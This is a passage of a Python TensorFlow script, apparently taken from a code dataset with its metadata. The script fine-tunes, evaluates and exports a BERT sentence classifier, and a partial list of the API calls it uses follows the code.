data_path = os.path.join(self.data_dir, \"train-{0}\".format(self.task_name), \"train-{0}.json\".format(self.task_name))\n data_list = self._read_json(data_path)\n example_list = self._get_example(data_list)\n return example_list\n \n def get_dev_examples(self):\n \"\"\"Gets a collection of \`InputExample\`s for the dev set.\"\"\"\n data_path = os.path.join(self.data_dir, \"dev-{0}\".format(self.task_name), \"dev-{0}.json\".format(self.task_name))\n data_list = self._read_json(data_path)\n example_list = self._get_example(data_list)\n return example_list\n \n def get_test_examples(self):\n \"\"\"Gets a collection of \`InputExample\`s for the test set.\"\"\"\n data_path = os.path.join(self.data_dir, \"test-{0}\".format(self.task_name), \"test-{0}.json\".format(self.task_name))\n data_list = self._read_json(data_path)\n example_list = self._get_example(data_list)\n return example_list\n \n def get_sent_labels(self):\n \"\"\"Gets the list of sentence labels for this data set.\"\"\"\n data_path = os.path.join(self.data_dir, \"resource\", \"sent_label.vocab\")\n sent_labels = self._read_text(data_path)\n return sent_labels\n \n def _read_text(self,\n data_path):\n if os.path.exists(data_path):\n with open(data_path, \"rb\") as file:\n data_list = []\n for line in file:\n data_list.append(line.decode(\"utf-8\").strip())\n\n return data_list\n else:\n raise FileNotFoundError(\"data path not found\")\n \n def _read_json(self,\n data_path):\n if os.path.exists(data_path):\n with open(data_path, \"r\") as file:\n data_list = json.load(file)\n return data_list\n else:\n raise FileNotFoundError(\"data path not found\")\n \n def _get_example(self,\n data_list):\n example_list = []\n for data in data_list:\n guid = data[\"id\"]\n text = tokenization.convert_to_unicode(data[\"text\"])\n sent_label = tokenization.convert_to_unicode(data[\"sent_label\"])\n example = InputExample(guid=guid, text=text, sent_label=sent_label)\n example_list.append(example)\n \n return example_list\n\ndef convert_single_example(ex_index,\n example,\n sent_label_list,\n max_seq_length,\n tokenizer):\n \"\"\"Converts a single \`InputExample\` into a single \`InputFeatures\`.\"\"\"\n if isinstance(example, PaddingInputExample):\n return InputFeatures(\n input_ids=[0] * 
max_seq_length,\n input_masks=[0] * max_seq_length,\n segment_ids=[0] * max_seq_length,\n sent_label_id=0)\n \n sent_label_map = {}\n for (i, sent_label) in enumerate(sent_label_list):\n sent_label_map[sent_label] = i\n \n tokens = tokenizer.tokenize(example.text)\n \n if len(tokens) > max_seq_length - 2:\n tokens = tokens[0:(max_seq_length - 2)]\n \n # The convention in BERT is:\n # (a) For sequence pairs:\n # tokens: [CLS] is this jack ##son ##ville ? [SEP] no it is not . [SEP]\n # type_ids: 0 0 0 0 0 0 0 0 1 1 1 1 1 1\n # (b) For single sequences:\n # tokens: [CLS] the dog is hairy . [SEP]\n # type_ids: 0 0 0 0 0 0 0\n #\n # Where \"type_ids\" are used to indicate whether this is the first\n # sequence or the second sequence. The embedding vectors for `type=0` and\n # `type=1` were learned during pre-training and are added to the wordpiece\n # embedding vector (and position vector). This is not *strictly* necessary\n # since the [SEP] token unambiguously separates the sequences, but it makes\n # it easier for the model to learn the concept of sequences.\n #\n # For classification tasks, the first vector (corresponding to [CLS]) is\n # used as the \"sentence vector\". Note that this only makes sense because\n # the entire model is fine-tuned.\n \n input_tokens = []\n segment_ids = []\n sent_label_id = sent_label_map[example.sent_label]\n \n input_tokens.append(\"[CLS]\")\n segment_ids.append(0)\n \n for token in tokens:\n input_tokens.append(token)\n segment_ids.append(0)\n \n input_tokens.append(\"[SEP]\")\n segment_ids.append(0)\n \n input_ids = tokenizer.convert_tokens_to_ids(input_tokens)\n \n # The mask has 1 for real tokens and 0 for padding tokens. Only real tokens are attended to.\n input_masks = [1] * len(input_ids)\n \n # Zero-pad up to the sequence length.\n while len(input_ids) < max_seq_length:\n input_ids.append(0)\n input_masks.append(0)\n segment_ids.append(0)\n\n assert len(input_ids) == max_seq_length\n assert len(input_masks) == max_seq_length\n assert len(segment_ids) == max_seq_length\n \n if ex_index < 5:\n tf.logging.info(\"*** Example ***\")\n tf.logging.info(\"guid: %s\" % (example.guid))\n tf.logging.info(\"tokens: %s\" % \" \".join([tokenization.printable_text(x) for x in tokens]))\n tf.logging.info(\"input_ids: %s\" % \" \".join([str(x) for x in input_ids]))\n tf.logging.info(\"input_masks: %s\" % \" \".join([str(x) for x in input_masks]))\n tf.logging.info(\"segment_ids: %s\" % \" \".join([str(x) for x in segment_ids]))\n tf.logging.info(\"sent_label_id: %s\" % str(sent_label_id))\n\n feature = InputFeatures(\n input_ids=input_ids,\n input_masks=input_masks,\n segment_ids=segment_ids,\n sent_label_id=sent_label_id)\n return feature\n\ndef convert_examples_to_features(examples,\n sent_label_list,\n max_seq_length,\n tokenizer):\n \"\"\"Convert a set of `InputExample`s to a list of `InputFeatures`.\"\"\"\n features = []\n for (ex_index, example) in enumerate(examples):\n if ex_index % 10000 == 0:\n tf.logging.info(\"Writing example %d of %d\" % (ex_index, len(examples)))\n \n feature = convert_single_example(ex_index, example, sent_label_list, max_seq_length, tokenizer)\n features.append(feature)\n \n return features\n\ndef input_fn_builder(features,\n seq_length,\n is_training,\n drop_remainder):\n \"\"\"Creates an `input_fn` closure to be passed to TPUEstimator.\"\"\"\n all_input_ids = []\n all_input_masks = []\n all_segment_ids = []\n all_sent_label_ids = []\n \n for feature in features:\n all_input_ids.append(feature.input_ids)\n 
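# NOTE: these parallel in-memory lists feed tf.data.Dataset.from_tensor_slices() below, which wraps every\n # example in graph constants; that is fine for the demo-sized sets handled here, but large corpora should\n # go through the file-based TFRecord input_fn defined later in this file.\n 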
all_input_masks.append(feature.input_masks)\n all_segment_ids.append(feature.segment_ids)\n all_sent_label_ids.append(feature.sent_label_id)\n \n def input_fn(params):\n batch_size = params[\"batch_size\"]\n num_examples = len(features)\n\n # This is for demo purposes and does NOT scale to large data sets. We do\n # not use Dataset.from_generator() because that uses tf.py_func which is\n # not TPU compatible. The right way to load data is with TFRecordReader.\n d = tf.data.Dataset.from_tensor_slices({\n \"input_ids\": tf.constant(all_input_ids, shape=[num_examples, seq_length], dtype=tf.int32),\n \"input_masks\": tf.constant(all_input_masks, shape=[num_examples, seq_length], dtype=tf.int32),\n \"segment_ids\": tf.constant(all_segment_ids, shape=[num_examples, seq_length], dtype=tf.int32),\n \"sent_label_ids\": tf.constant(all_sent_label_ids, shape=[num_examples], dtype=tf.int32),\n })\n \n if is_training:\n d = d.repeat()\n d = d.shuffle(buffer_size=100, seed=np.random.randint(10000))\n \n d = d.batch(batch_size=batch_size, drop_remainder=drop_remainder)\n return d\n \n return input_fn\n\ndef file_based_convert_examples_to_features(examples,\n sent_label_list,\n max_seq_length,\n tokenizer,\n output_file):\n \"\"\"Convert a set of `InputExample`s to a TFRecord file.\"\"\"\n def create_int_feature(values):\n return tf.train.Feature(int64_list=tf.train.Int64List(value=list(values)))\n \n writer = tf.python_io.TFRecordWriter(output_file)\n \n for (ex_index, example) in enumerate(examples):\n if ex_index % 10000 == 0:\n tf.logging.info(\"Writing example %d of %d\" % (ex_index, len(examples)))\n \n feature = convert_single_example(ex_index, example, sent_label_list, max_seq_length, tokenizer)\n \n features = collections.OrderedDict()\n features[\"input_ids\"] = create_int_feature(feature.input_ids)\n features[\"input_masks\"] = create_int_feature(feature.input_masks)\n features[\"segment_ids\"] = create_int_feature(feature.segment_ids)\n features[\"sent_label_ids\"] = create_int_feature([feature.sent_label_id])\n \n tf_example = tf.train.Example(features=tf.train.Features(feature=features))\n \n writer.write(tf_example.SerializeToString())\n \n writer.close()\n\ndef file_based_input_fn_builder(input_file,\n seq_length,\n is_training,\n drop_remainder):\n \"\"\"Creates an `input_fn` closure to be passed to TPUEstimator.\"\"\"\n name_to_features = {\n \"input_ids\": tf.FixedLenFeature([seq_length], tf.int64),\n \"input_masks\": tf.FixedLenFeature([seq_length], tf.int64),\n \"segment_ids\": tf.FixedLenFeature([seq_length], tf.int64),\n \"sent_label_ids\": tf.FixedLenFeature([], tf.int64),\n }\n \n def _decode_record(record,\n name_to_features):\n \"\"\"Decodes a record to a TensorFlow example.\"\"\"\n example = tf.parse_single_example(record, name_to_features)\n \n # tf.Example only supports tf.int64, but the TPU only supports tf.int32. 
So cast all int64 to int32.\n for name in list(example.keys()):\n t = example[name]\n if t.dtype == tf.int64:\n t = tf.to_int32(t)\n example[name] = t\n \n return example\n \n def input_fn(params):\n \"\"\"The actual input function.\"\"\"\n batch_size = params[\"batch_size\"]\n \n # For training, we want a lot of parallel reading and shuffling.\n # For eval, we want no shuffling and parallel reading doesn't matter.\n d = tf.data.TFRecordDataset(input_file)\n \n if is_training:\n d = d.repeat()\n d = d.shuffle(buffer_size=100, seed=np.random.randint(10000))\n \n d = d.apply(tf.contrib.data.map_and_batch(\n lambda record: _decode_record(record, name_to_features),\n batch_size=batch_size,\n drop_remainder=drop_remainder))\n \n return d\n \n return input_fn\n\ndef create_model(bert_config,\n input_ids,\n input_masks,\n segment_ids,\n sent_label_ids,\n sent_label_list,\n mode,\n use_tpu):\n \"\"\"Creates a Classifier model.\"\"\"\n is_training = (mode == tf.estimator.ModeKeys.TRAIN)\n model = modeling.BertModel(\n config=bert_config,\n is_training=is_training,\n input_ids=input_ids,\n input_mask=input_masks,\n token_type_ids=segment_ids,\n use_one_hot_embeddings=use_tpu)\n \n # If you want to use sentence-level output, use model.get_pooled_output()\n # If you want to use token-level output, use model.get_sequence_output()\n with tf.variable_scope(\"sent\", reuse=tf.AUTO_REUSE):\n sent_result = model.get_pooled_output()\n sent_result_mask = tf.cast(tf.reduce_max(input_masks, axis=-1, keepdims=True), dtype=tf.float32)\n \n sent_kernel_initializer = tf.glorot_uniform_initializer(seed=np.random.randint(10000), dtype=tf.float32)\n sent_bias_initializer = tf.zeros_initializer()\n sent_dense_layer = tf.keras.layers.Dense(units=len(sent_label_list), activation=None, use_bias=True,\n kernel_initializer=sent_kernel_initializer, bias_initializer=sent_bias_initializer,\n kernel_regularizer=None, bias_regularizer=None, trainable=True)\n \n sent_dropout_layer = tf.keras.layers.Dropout(rate=0.1, seed=np.random.randint(10000))\n \n sent_result = sent_dense_layer(sent_result)\n if mode == tf.estimator.ModeKeys.TRAIN:\n sent_result = sent_dropout_layer(sent_result)\n # examples whose input mask is all zeros get MIN_FLOAT logits, so the softmax effectively ignores them\n masked_sent_predict = sent_result * sent_result_mask + MIN_FLOAT * (1 - sent_result_mask)\n sent_predict_probs = tf.nn.softmax(masked_sent_predict, axis=-1)\n sent_predict_ids = tf.cast(tf.argmax(sent_predict_probs, axis=-1), dtype=tf.int32)\n sent_predict_scores = tf.reduce_max(sent_predict_probs, axis=-1)\n \n loss = tf.constant(0.0, dtype=tf.float32)\n if mode not in [tf.estimator.ModeKeys.TRAIN, tf.estimator.ModeKeys.EVAL]:\n return loss, sent_predict_ids, sent_predict_scores, sent_predict_probs\n \n if sent_label_ids is not None:\n with tf.variable_scope(\"sent_loss\", reuse=tf.AUTO_REUSE):\n sent_label = tf.cast(sent_label_ids, dtype=tf.float32)\n sent_label_mask = tf.cast(tf.reduce_max(input_masks, axis=-1), dtype=tf.float32)\n masked_sent_label = tf.cast(sent_label * sent_label_mask, dtype=tf.int32)\n sent_cross_entropy = tf.nn.sparse_softmax_cross_entropy_with_logits(labels=masked_sent_label, logits=masked_sent_predict)\n sent_loss = tf.reduce_sum(sent_cross_entropy * sent_label_mask) / tf.reduce_sum(tf.reduce_max(sent_label_mask, axis=-1))\n loss = loss + sent_loss\n \n return loss, sent_predict_ids, sent_predict_scores, sent_predict_probs\n\ndef model_fn_builder(bert_config,\n sent_label_list,\n init_checkpoint,\n learning_rate,\n num_train_steps,\n num_warmup_steps,\n use_tpu):\n \"\"\"Returns \`model_fn\` closure for 
TPUEstimator.\"\"\"\n def model_fn(features,\n labels,\n mode,\n params): # pylint: disable=unused-argument\n \"\"\"The `model_fn` for TPUEstimator.\"\"\"\n tf.logging.info(\"*** Features ***\")\n for name in sorted(features.keys()):\n tf.logging.info(\" name = %s, shape = %s\" % (name, features[name].shape))\n \n input_ids = features[\"input_ids\"]\n input_masks = features[\"input_masks\"]\n segment_ids = features[\"segment_ids\"]\n sent_label_ids = features[\"sent_label_ids\"] if mode in [tf.estimator.ModeKeys.TRAIN, tf.estimator.ModeKeys.EVAL] else None\n \n loss, sent_predict_ids, sent_predict_scores, sent_predict_probs = create_model(bert_config,\n input_ids, input_masks, segment_ids, sent_label_ids, sent_label_list, mode, use_tpu)\n \n tvars = tf.trainable_variables()\n initialized_variable_names = {}\n scaffold_fn = None\n \n if init_checkpoint:\n assignment_map, initialized_variable_names = modeling.get_assignment_map_from_checkpoint(tvars, init_checkpoint)\n \n if use_tpu:\n def tpu_scaffold():\n tf.train.init_from_checkpoint(init_checkpoint, assignment_map)\n return tf.train.Scaffold()\n \n scaffold_fn = tpu_scaffold\n else:\n tf.train.init_from_checkpoint(init_checkpoint, assignment_map)\n \n tf.logging.info(\"**** Trainable Variables ****\")\n for var in tvars:\n init_string = \"\"\n if var.name in initialized_variable_names:\n init_string = \", *INIT_FROM_CKPT*\"\n \n tf.logging.info(\" name = %s, shape = %s%s\", var.name, var.shape, init_string)\n \n output_spec = None \n if mode == tf.estimator.ModeKeys.TRAIN:\n train_op = optimization.create_optimizer(loss, learning_rate, num_train_steps, num_warmup_steps, use_tpu)\n output_spec = tf.contrib.tpu.TPUEstimatorSpec(\n mode=mode,\n loss=loss,\n train_op=train_op,\n scaffold_fn=scaffold_fn)\n elif mode == tf.estimator.ModeKeys.EVAL:\n def metric_fn(sent_label_ids,\n sent_predict_ids):\n sent_accuracy = tf.metrics.accuracy(labels=sent_label_ids, predictions=sent_predict_ids)\n \n metric = {\n \"sent_accuracy\": sent_accuracy,\n }\n \n return metric\n \n eval_metrics = (metric_fn, [sent_label_ids, sent_predict_ids])\n output_spec = tf.contrib.tpu.TPUEstimatorSpec(\n mode=mode,\n loss=loss,\n eval_metrics=eval_metrics,\n scaffold_fn=scaffold_fn)\n else:\n output_spec = tf.contrib.tpu.TPUEstimatorSpec(\n mode=mode,\n predictions={\n \"sent_predict_id\": sent_predict_ids,\n \"sent_predict_score\": sent_predict_scores,\n \"sent_predict_prob\": sent_predict_probs\n },\n scaffold_fn=scaffold_fn)\n \n return output_spec\n \n return model_fn\n\ndef get_masked_data(data_ids,\n label_list):\n label_map = {}\n for (i, label) in enumerate(label_list):\n label_map[label] = i\n\n pad_id = tf.constant(label_map[\"[PAD]\"], shape=[], dtype=tf.int32)\n out_id = tf.constant(label_map[\"O\"], shape=[], dtype=tf.int32)\n x_id = tf.constant(label_map[\"X\"], shape=[], dtype=tf.int32)\n cls_id = tf.constant(label_map[\"[CLS]\"], shape=[], dtype=tf.int32)\n sep_id = tf.constant(label_map[\"[SEP]\"], shape=[], dtype=tf.int32)\n\n masked_data_ids = (tf.cast(tf.not_equal(data_ids, pad_id), dtype=tf.int32) *\n tf.cast(tf.not_equal(data_ids, out_id), dtype=tf.int32) *\n tf.cast(tf.not_equal(data_ids, x_id), dtype=tf.int32) *\n tf.cast(tf.not_equal(data_ids, cls_id), dtype=tf.int32) *\n tf.cast(tf.not_equal(data_ids, sep_id), dtype=tf.int32))\n \n return masked_data_ids\n\ndef serving_input_fn():\n with tf.variable_scope(\"export\"):\n features = {\n 'input_ids': tf.placeholder(tf.int32, [None, FLAGS.max_seq_length], name='input_ids'),\n 'input_masks': 
tf.placeholder(tf.int32, [None, FLAGS.max_seq_length], name='input_masks'),\n 'segment_ids': tf.placeholder(tf.int32, [None, FLAGS.max_seq_length], name='segment_ids')\n }\n \n return tf.estimator.export.build_raw_serving_input_receiver_fn(features)()\n\ndef decode_predicts(predicts,\n sent_label_list,\n max_seq_length,\n tokenizer):\n decoded_predicts = []\n for predict in predicts:\n input_tokens = tokenizer.convert_ids_to_tokens(predict[\"input_ids\"])\n input_masks = predict[\"input_masks\"]\n \n decoded_tokens = []\n for input_token, input_mask in zip(input_tokens, input_masks):\n if input_mask == 0:\n break\n \n if input_token in [\"[CLS]\", \"[SEP]\"]:\n continue\n \n if input_token[:2] == \"##\":\n decoded_tokens[-1] = decoded_tokens[-1] + input_token[2:]\n continue\n \n decoded_tokens.append(input_token)\n \n decoded_predict = {\n \"text\": \" \".join(decoded_tokens),\n \"sent_label\": sent_label_list[predict[\"sent_label_id\"]],\n \"sent_predict\": sent_label_list[predict[\"sent_predict_id\"]],\n \"sent_score\": float(predict[\"sent_predict_score\"]),\n \"sent_probs\": [float(prob) for prob in predict[\"sent_predict_prob\"]]\n }\n \n decoded_predicts.append(decoded_predict)\n \n return decoded_predicts\n\ndef write_to_json(data_list,\n data_path):\n data_folder = os.path.dirname(data_path)\n if not os.path.exists(data_folder):\n os.mkdir(data_folder)\n \n with open(data_path, \"w\") as file: \n json.dump(data_list, file, indent=4)\n\ndef write_to_text(data_list,\n data_path):\n data_folder = os.path.dirname(data_path)\n if not os.path.exists(data_folder):\n os.mkdir(data_folder)\n \n with open(data_path, \"w\") as file:\n for data in data_list:\n file.write(\"{0}\\n\".format(data))\n\ndef main(_):\n tf.logging.set_verbosity(tf.logging.INFO)\n \n np.random.seed(FLAGS.random_seed)\n \n bert_config = modeling.BertConfig.from_json_file(FLAGS.bert_config_file)\n \n if FLAGS.max_seq_length > bert_config.max_position_embeddings:\n raise ValueError(\"Cannot use sequence length %d because the BERT model was only trained up to sequence length %d\" %\n (FLAGS.max_seq_length, bert_config.max_position_embeddings))\n \n tf.gfile.MakeDirs(FLAGS.output_dir)\n \n tokenization.validate_case_matches_checkpoint(FLAGS.do_lower_case, FLAGS.init_checkpoint)\n tokenizer = tokenization.FullTokenizer(vocab_file=FLAGS.vocab_file, do_lower_case=FLAGS.do_lower_case)\n \n data_dir = FLAGS.data_dir\n task_name = FLAGS.task_name.lower()\n processor = ClassificationProcessor(data_dir, task_name)\n sent_label_list = processor.get_sent_labels()\n \n train_examples = None\n num_train_steps = None\n num_warmup_steps = None\n if FLAGS.do_train:\n train_examples = processor.get_train_examples()\n num_train_steps = int(len(train_examples) / FLAGS.train_batch_size * FLAGS.num_train_epochs)\n num_warmup_steps = int(num_train_steps * FLAGS.warmup_proportion)\n \n tpu_cluster_resolver = None\n if FLAGS.use_tpu and FLAGS.tpu_name:\n tpu_cluster_resolver = tf.contrib.cluster_resolver.TPUClusterResolver(\n FLAGS.tpu_name, zone=FLAGS.tpu_zone, project=FLAGS.gcp_project)\n \n is_per_host = tf.contrib.tpu.InputPipelineConfig.PER_HOST_V2\n run_config = tf.contrib.tpu.RunConfig(\n cluster=tpu_cluster_resolver,\n master=FLAGS.master,\n model_dir=FLAGS.output_dir,\n save_checkpoints_steps=FLAGS.save_checkpoints_steps,\n tpu_config=tf.contrib.tpu.TPUConfig(\n iterations_per_loop=FLAGS.iterations_per_loop,\n num_shards=FLAGS.num_tpu_cores,\n per_host_input_for_training=is_per_host))\n \n model_fn = model_fn_builder(\n 
bert_config=bert_config,\n sent_label_list=sent_label_list,\n init_checkpoint=FLAGS.init_checkpoint,\n learning_rate=FLAGS.learning_rate,\n num_train_steps=num_train_steps,\n num_warmup_steps=num_warmup_steps,\n use_tpu=FLAGS.use_tpu)\n \n # If TPU is not available, this will fall back to normal Estimator on CPU or GPU.\n estimator = tf.contrib.tpu.TPUEstimator(\n use_tpu=FLAGS.use_tpu,\n model_fn=model_fn,\n config=run_config,\n export_to_tpu=FLAGS.use_tpu,\n train_batch_size=FLAGS.train_batch_size,\n eval_batch_size=FLAGS.eval_batch_size,\n predict_batch_size=FLAGS.predict_batch_size)\n \n if FLAGS.do_train:\n tf.logging.info(\"***** Run training *****\")\n tf.logging.info(\" Num examples = %d\", len(train_examples))\n tf.logging.info(\" Batch size = %d\", FLAGS.train_batch_size)\n tf.logging.info(\" Num steps = %d\", num_train_steps)\n \n train_features = convert_examples_to_features(\n examples=train_examples,\n sent_label_list=sent_label_list,\n max_seq_length=FLAGS.max_seq_length,\n tokenizer=tokenizer)\n\n train_input_fn = input_fn_builder(\n features=train_features,\n seq_length=FLAGS.max_seq_length,\n is_training=True,\n drop_remainder=True)\n \n estimator.train(input_fn=train_input_fn, max_steps=num_train_steps)\n \n if FLAGS.do_eval:\n eval_examples = processor.get_dev_examples()\n tf.logging.info(\"***** Run evaluation *****\")\n tf.logging.info(\" Num examples = %d\", len(eval_examples))\n tf.logging.info(\" Batch size = %d\", FLAGS.eval_batch_size)\n \n eval_features = convert_examples_to_features(\n examples=eval_examples,\n sent_label_list=sent_label_list,\n max_seq_length=FLAGS.max_seq_length,\n tokenizer=tokenizer)\n\n eval_input_fn = input_fn_builder(\n features=eval_features,\n seq_length=FLAGS.max_seq_length,\n is_training=False,\n drop_remainder=False)\n \n result = estimator.evaluate(input_fn=eval_input_fn)\n \n sent_accuracy = result[\"sent_accuracy\"]\n \n tf.logging.info(\"***** Evaluation result *****\")\n tf.logging.info(\" Accuracy (sent-level) = %s\", str(sent_accuracy))\n \n if FLAGS.do_predict:\n predict_examples = processor.get_test_examples()\n tf.logging.info(\"***** Run prediction *****\")\n tf.logging.info(\" Num examples = %d\", len(predict_examples))\n tf.logging.info(\" Batch size = %d\", FLAGS.predict_batch_size)\n \n predict_features = convert_examples_to_features(\n examples=predict_examples,\n sent_label_list=sent_label_list,\n max_seq_length=FLAGS.max_seq_length,\n tokenizer=tokenizer)\n\n predict_input_fn = input_fn_builder(\n features=predict_features,\n seq_length=FLAGS.max_seq_length,\n is_training=False,\n drop_remainder=False)\n \n result = estimator.predict(input_fn=predict_input_fn)\n \n predicts = [{\n \"input_ids\": feature.input_ids,\n \"input_masks\": feature.input_masks,\n \"sent_label_id\": feature.sent_label_id,\n \"sent_predict_id\": predict[\"sent_predict_id\"],\n \"sent_predict_score\": predict[\"sent_predict_score\"],\n \"sent_predict_prob\": predict[\"sent_predict_prob\"].tolist()\n } for feature, predict in zip(predict_features, result)]\n \n decoded_predicts = decode_predicts(\n predicts=predicts,\n sent_label_list=sent_label_list,\n max_seq_length=FLAGS.max_seq_length,\n tokenizer=tokenizer)\n \n predict_tag = FLAGS.predict_tag if FLAGS.predict_tag else str(time.time())\n output_path = os.path.join(FLAGS.output_dir, \"predict.{0}.json\".format(predict_tag))\n write_to_json(decoded_predicts, output_path)\n \n if FLAGS.do_export:\n tf.logging.info(\"***** Run export *****\")\n tf.gfile.MakeDirs(FLAGS.export_dir)\n 
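# export_savedmodel() builds the SavedModel around serving_input_fn above, whose signature is the three raw\n # int32 placeholders (input_ids, input_masks, segment_ids), each shaped [None, max_seq_length]; callers are\n # expected to run the same WordPiece tokenization and padding before invoking the exported model.\n 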
estimator.export_savedmodel(FLAGS.export_dir, serving_input_fn, as_text=False)\n\nif __name__ == \"__main__\":\n flags.mark_flag_as_required(\"bert_config_file\")\n flags.mark_flag_as_required(\"vocab_file\")\n flags.mark_flag_as_required(\"init_checkpoint\")\n flags.mark_flag_as_required(\"data_dir\")\n flags.mark_flag_as_required(\"output_dir\")\n flags.mark_flag_as_required(\"export_dir\")\n tf.app.run()\n", "sub_path": "run_classifier.py", "file_name": "run_classifier.py", "file_ext": "py", "file_size_in_byte": 32859, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "tensorflow.flags", "line_number": 20, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 129, "usage_type": "call"}, {"api_name": "os.path", "line_number": 129, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 136, "usage_type": "call"}, {"api_name": "os.path", "line_number": 136, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 143, "usage_type": "call"}, {"api_name": "os.path", "line_number": 143, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 150, "usage_type": "call"}, {"api_name": "os.path", "line_number": 150, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 156, "usage_type": "call"}, {"api_name": "os.path", "line_number": 156, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 168, "usage_type": "call"}, {"api_name": "os.path", "line_number": 168, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 170, "usage_type": "call"}, {"api_name": "bert.tokenization.convert_to_unicode", "line_number": 180, "usage_type": "call"}, {"api_name": "bert.tokenization", "line_number": 180, "usage_type": "name"}, {"api_name": "bert.tokenization.convert_to_unicode", "line_number": 181, "usage_type": "call"}, {"api_name": "bert.tokenization", "line_number": 181, "usage_type": "name"}, {"api_name": "tensorflow.logging.info", "line_number": 258, "usage_type": "call"}, {"api_name": "tensorflow.logging", "line_number": 258, "usage_type": "attribute"}, {"api_name": "tensorflow.logging.info", "line_number": 259, "usage_type": "call"}, {"api_name": "tensorflow.logging", "line_number": 259, "usage_type": "attribute"}, {"api_name": "tensorflow.logging.info", "line_number": 260, "usage_type": "call"}, {"api_name": "tensorflow.logging", "line_number": 260, "usage_type": "attribute"}, {"api_name": "bert.tokenization.printable_text", "line_number": 260, "usage_type": "call"}, {"api_name": "bert.tokenization", "line_number": 260, "usage_type": "name"}, {"api_name": "tensorflow.logging.info", "line_number": 261, "usage_type": "call"}, {"api_name": "tensorflow.logging", "line_number": 261, "usage_type": "attribute"}, {"api_name": "tensorflow.logging.info", "line_number": 262, "usage_type": "call"}, {"api_name": "tensorflow.logging", "line_number": 262, "usage_type": "attribute"}, {"api_name": "tensorflow.logging.info", "line_number": 263, "usage_type": "call"}, {"api_name": "tensorflow.logging", "line_number": 263, "usage_type": "attribute"}, {"api_name": "tensorflow.logging.info", "line_number": 264, "usage_type": "call"}, {"api_name": "tensorflow.logging", "line_number": 264, "usage_type": "attribute"}, {"api_name": "tensorflow.logging.info", "line_number": 281, "usage_type": "call"}, {"api_name": "tensorflow.logging", "line_number": 281, "usage_type": "attribute"}, {"api_name": 
"tensorflow.data.Dataset.from_tensor_slices", "line_number": 311, "usage_type": "call"}, {"api_name": "tensorflow.data", "line_number": 311, "usage_type": "attribute"}, {"api_name": "tensorflow.constant", "line_number": 312, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 312, "usage_type": "attribute"}, {"api_name": "tensorflow.constant", "line_number": 313, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 313, "usage_type": "attribute"}, {"api_name": "tensorflow.constant", "line_number": 314, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 314, "usage_type": "attribute"}, {"api_name": "tensorflow.constant", "line_number": 315, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 315, "usage_type": "attribute"}, {"api_name": "numpy.random.randint", "line_number": 320, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 320, "usage_type": "attribute"}, {"api_name": "tensorflow.train.Feature", "line_number": 334, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 334, "usage_type": "attribute"}, {"api_name": "tensorflow.train.Int64List", "line_number": 334, "usage_type": "call"}, {"api_name": "tensorflow.python_io.TFRecordWriter", "line_number": 336, "usage_type": "call"}, {"api_name": "tensorflow.python_io", "line_number": 336, "usage_type": "attribute"}, {"api_name": "tensorflow.logging.info", "line_number": 340, "usage_type": "call"}, {"api_name": "tensorflow.logging", "line_number": 340, "usage_type": "attribute"}, {"api_name": "collections.OrderedDict", "line_number": 344, "usage_type": "call"}, {"api_name": "tensorflow.train.Example", "line_number": 350, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 350, "usage_type": "attribute"}, {"api_name": "tensorflow.train.Features", "line_number": 350, "usage_type": "call"}, {"api_name": "tensorflow.FixedLenFeature", "line_number": 362, "usage_type": "call"}, {"api_name": "tensorflow.int64", "line_number": 362, "usage_type": "attribute"}, {"api_name": "tensorflow.FixedLenFeature", "line_number": 363, "usage_type": "call"}, {"api_name": "tensorflow.int64", "line_number": 363, "usage_type": "attribute"}, {"api_name": "tensorflow.FixedLenFeature", "line_number": 364, "usage_type": "call"}, {"api_name": "tensorflow.int64", "line_number": 364, "usage_type": "attribute"}, {"api_name": "tensorflow.FixedLenFeature", "line_number": 365, "usage_type": "call"}, {"api_name": "tensorflow.int64", "line_number": 365, "usage_type": "attribute"}, {"api_name": "tensorflow.parse_single_example", "line_number": 371, "usage_type": "call"}, {"api_name": "tensorflow.int64", "line_number": 376, "usage_type": "attribute"}, {"api_name": "tensorflow.to_int32", "line_number": 377, "usage_type": "call"}, {"api_name": "tensorflow.data.TFRecordDataset", "line_number": 388, "usage_type": "call"}, {"api_name": "tensorflow.data", "line_number": 388, "usage_type": "attribute"}, {"api_name": "numpy.random.randint", "line_number": 392, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 392, "usage_type": "attribute"}, {"api_name": "tensorflow.contrib.data.map_and_batch", "line_number": 394, "usage_type": "call"}, {"api_name": "tensorflow.contrib", "line_number": 394, "usage_type": "attribute"}, {"api_name": "tensorflow.estimator", "line_number": 412, "usage_type": "attribute"}, {"api_name": "bert.modeling.BertModel", "line_number": 413, "usage_type": "call"}, {"api_name": "bert.modeling", "line_number": 413, "usage_type": 
"name"}, {"api_name": "tensorflow.variable_scope", "line_number": 423, "usage_type": "call"}, {"api_name": "tensorflow.AUTO_REUSE", "line_number": 423, "usage_type": "attribute"}, {"api_name": "tensorflow.cast", "line_number": 425, "usage_type": "call"}, {"api_name": "tensorflow.reduce_max", "line_number": 425, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 425, "usage_type": "attribute"}, {"api_name": "tensorflow.glorot_uniform_initializer", "line_number": 427, "usage_type": "call"}, {"api_name": "numpy.random.randint", "line_number": 427, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 427, "usage_type": "attribute"}, {"api_name": "tensorflow.float32", "line_number": 427, "usage_type": "attribute"}, {"api_name": "tensorflow.zeros_initializer", "line_number": 428, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 429, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 429, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.layers.Dropout", "line_number": 